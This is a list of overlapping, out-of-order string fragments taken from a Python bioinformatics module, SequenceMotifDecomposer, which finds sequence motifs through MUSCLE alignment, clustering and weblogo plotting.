"seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs =",
"__init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if this alphabet is required #",
"align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' +",
"haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches = re.findall(needle, s, overlapped=True) if",
"IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def",
"letter != '-': code.append(letter) if len(code) == 0: code_str = None elif len(code)",
"half_windw_size]) if min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids =",
"float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val,",
"import linkage import regex as re from collections import Counter from sklearn import",
"+= '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs return",
"val = k[0][1] if float(val) / dim >= min_freq: score += 1 trimmed_align_seqs",
"= StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers, data def _perform_ma(self,",
"np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3):",
"begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id in",
"neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1]) if n_jobs ==",
"output='all') subseqs = [] for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin =",
"for scores in smod.score(seqs): sig = np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch:",
"line: if line[0] == '>': if seq: yield seq seq = \"\" line_str",
"seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores = [score for header, score,",
"fname=None): \"\"\"Report in markdown format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx, distances",
"= self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq in iterable: new_header =",
"in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] += 1 if i !=",
"n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"#!/usr/bin/env python \"\"\"SequenceMotifDecomposer is a motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\"",
"= [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster =",
"std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme =",
"\"\"\"find_occurrences.\"\"\" for h, s in haystack: matches = re.findall(needle, s, overlapped=True) if len(matches):",
"cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s in",
"return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for j in",
"n_i + n_j) logger.debug(info1 + info2) # update motives motives[i] = motif del",
"from corebio.seq import Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy import linkage",
"return logos else: logger.warning( 'No logo to compute. Try more permissive parameters.') def",
"rel_nw_score) info2 = ' deleting: %d [%d is now #%d]' % \\ (j,",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\"",
"header, begin, end, p, subseq in iterable: new_header = header new_header += '<loc>'",
"return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix",
"compute_cooccurence(motives) info = '### Summary: %d motives' % len(motives) txt.append(info) figname = plot_cumulative_score(",
"- start_time)) logger.debug('Predicting') start_time = time.time() scores_items = [] for i, p in",
"subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score",
"__init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1,",
"in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs",
"= str(line) yield line_str.strip() else: line_str = line.split() if line_str: seq += str(line_str[0]).strip()",
"cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as f:",
"regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs}",
"= row[i] if norm != 0: row /= norm else: row = np.zeros(row.shape)",
"seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs",
"in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein':",
"check if this alphabet is required # it over-rides tool.alphabet alphabet='dna', # ['dna',",
"import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import time from",
"time.time() classes = np.array([1, -1]) if n_jobs == -1: pool = mp.Pool() else:",
"# ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True),",
"logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation,",
"[] if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url +",
"None or std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality",
"= np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None,",
"in centers[i]: for c_j in centers[j]: if selected_abs == abs(c_i - c_j): selected",
"finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing as mp",
"[] for i, p in enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items",
"for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False,",
"_compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq in align_seqs: str_list = [c",
"freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq,",
"vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components =",
"h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and",
"in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time",
"min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives(",
"from scipy.cluster.hierarchy import linkage import regex as re from collections import Counter from",
"seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids = set(cluster_ids) for i",
"seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs",
"figname = None plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs =",
"def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms",
"cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = '#### Motif",
"y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint",
"= os.getcwd() url = pwd + '/' + fname txt = [] if",
"if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label",
"def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in",
"neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size,",
"import Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy import linkage import regex",
"def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances = [list(x) for x in",
"in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin +",
"if std_th is None or std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives)",
"quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives:",
"min_score and len(align_seqs) > min_cluster_size: return True else: return False def compute_motif(self, seqs=None,",
"= sig[:median_len] else: if len(sig) >= median_len: sigs = sigs + sig[:median_len] sig",
"txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname",
"median_len: sigs = sig[:median_len] else: if len(sig) >= median_len: sigs = sigs +",
"i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() l = letter_regex(k,",
"color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line",
"% \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance(",
"motives: if ids is None: ids = [cluster_id for cluster_id in motives] logos",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = '",
"> 0: seqs = [s for h, s in clusters[cluster_id]] seq = sep.join(seqs)",
"max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components = self._decompose_header(header) orig_header, score,",
"= self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts:",
"n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances'",
"= sigmoid(value, self.a, self.b) p_val = 1 - y return p_val def compute_clusters(self,",
"cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders = [] for id1, id2 in",
"clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute their gram",
"!= median_len: logger.debug('Length mismatch: %d != %d' % (len(sig), median_len)) if sigs is",
"cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return",
"+ str(begin) + ':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if not",
"data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while",
"data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items = []",
"== '>': if seq: yield seq seq = \"\" line_str = str(line) yield",
"zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs =",
"motives else: logger.debug('After quality filter, %d motives' % len(_motives)) return _motives def select_motives(self,",
"if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs",
"1 trimmed_align_seqs = [] for h, align_seq in align_seqs: trimmed_align_seq = [a for",
"freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts avg, std =",
"pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool()",
"motif_seqs = [''] * len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1])",
"matches = re.findall(needle, s, overlapped=True) if len(matches): yield 1 else: yield 0 def",
"txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives to report. Try",
"\"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 - y return p_val",
"= [] for cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs = [s",
"\"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives",
"it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time",
"= None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix",
"\"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else: pool",
"try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return",
"plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable)",
"(time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = [] for i, p",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None):",
"align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and",
"False: break # TODO: run the predictor to learn the new class definition",
"nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives",
"len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq':",
"logger.debug('Fitting') start_time = time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time =",
"'<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items",
"30) else: avg_loc = -1 std_loc = 0 return avg_loc, std_loc def hits(motives,",
"% len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives =",
"units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' - num",
"mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for",
"align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname +",
"sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = '#### Motif id: %d'",
"distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3)",
"max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header) except Exception as",
"align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed",
"dim = len(align_seqs) cluster = [] for h, align_seq in align_seqs: str_list =",
"regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs':",
"return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs =",
"composition = 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False,",
"self._decompose_header(header) orig_header, score, begin, end, subseq = components p = self.compute_p_value(score) if p",
"end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end,",
"self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers",
"locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs,",
"sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment')",
"% (i, size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds)",
"multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1:",
"(len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y",
"cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close()",
"% (dtime)) self.clusters = defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After",
"<= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is too",
"SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format == 'png':",
"stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs",
"row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i,",
"pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:')",
"0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0] = 0",
"extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts,",
"= multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except",
"for h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs",
"+ '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt) def",
"Bio.Alphabet import IUPAC from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from corebio.seq",
"self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj):",
"import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import Seq from Bio.SeqRecord import",
"def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits',",
"= motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2",
"for header, seq in subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end, subseq",
"classes=classes) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size =",
"xs = np.sort(x) ys = np.arange(1, len(xs) + 1) / float(len(xs)) return xs,",
"= p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1]",
"= Counter(row) k = c.most_common() if k[0][0] == '-': to_be_removed.append(i) val = k[1][1]",
"0: logger.warning('Quality filter is too strict. Ignoring filter.') return motives else: logger.debug('After quality",
"1: code_str = code[0] else: code_str = '(' + '|'.join(code) + ')' return",
"ids is None: ids = [cluster_id for cluster_id in motives] logos = dict()",
"loc_start_time = time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time = time.time() -",
"MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord",
"distances = defaultdict(list) size = max(id for id in motives) + 1 cooccurence_mtx",
"on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n",
"min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.')",
"seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute their gram matrix",
"motives = dict() for cluster_id in clusters: start_time = time.time() # align with",
"header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin, end, subseq def decompose(self, seqs=None,",
"str(line) yield line_str.strip() else: line_str = line.split() if line_str: seq += str(line_str[0]).strip() if",
"secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------",
"y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix",
"plt import joblib from scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__) def",
"itertools import izip import time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import",
"%s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if",
"vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer))",
"defaultdict(list) size = max(id for id in motives) + 1 cooccurence_mtx = np.zeros((size,",
"info = ' - num subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = '",
"is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f' % \\ (i,",
"info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f' % \\ (i, n_i,",
"y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options =",
"success = True if success is False: break # TODO: run the predictor",
"cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary))",
"n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items = [] for i in",
"alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data,",
"= ' ' * (complexity * 2) # join all sequences in a",
"p.get() subarrays_items += subarrays_item d_time = time.time() - start_time d_loc_time = time.time() -",
"i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return",
"n_j, rel_nw_score) info2 = ' deleting: %d [%d is now #%d]' % \\",
"re.finditer(needle, s): s = match.start() e = match.end() m = s + (e",
"len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info",
"j)] info = ' - num co-occurences %d %s vs %d %s: %d'",
"chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time =",
"= [] for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence(",
"y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed",
"bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname def mean_shift_decomposition(sig,",
"options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index = first_position if logo_range: options.logo_start =",
"np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc = -1 std_loc = 0 return",
"learn the new class definition logger.debug('After merge, %d motives' % len(motives)) return motives",
"for line in lines: if line: if line[0] == '>': if seq: yield",
"figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ):",
"i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices += pos_data_matrix",
"data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data,",
"tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None):",
"y += [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix,",
"pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator)",
"min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.') mcs =",
"i, j in ms: if motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs'])",
"wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg':",
"logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' % (self.a,",
"options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution",
"str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform",
"y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion",
"in clusters: if len(clusters[cluster_id]) > 0: seqs = [s for h, s in",
"header new_header += '<loc>' + str(begin) + ':' new_header += str(end) + '<loc>'",
"for i in range(n): it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None,",
"in motives] logos = dict() for cluster_id in ids: logo_image, logo_txt = self.compute_logo(",
"header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':') begin =",
"True: items = [] for i in range(n): it = iterable.next() items.append(it) yield",
"with enough space that # kmers dont interfere cluster_seqs = [] for cluster_id",
"% (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b) p_val",
"ds = distances[(cluster_id, j)] info = ' - num co-occurences %d %s vs",
"/ dim >= min_freq: score += 1 trimmed_align_seqs = [] for h, align_seq",
"logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration. Reason: %s'",
"izip import time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from",
"options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title: options.title =",
"= logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title: options.title = title",
"[] for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() if",
"motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i)",
"- start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = [] for i, p in",
"yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs,",
"= [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f",
"def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if",
"\"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1):",
"their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c",
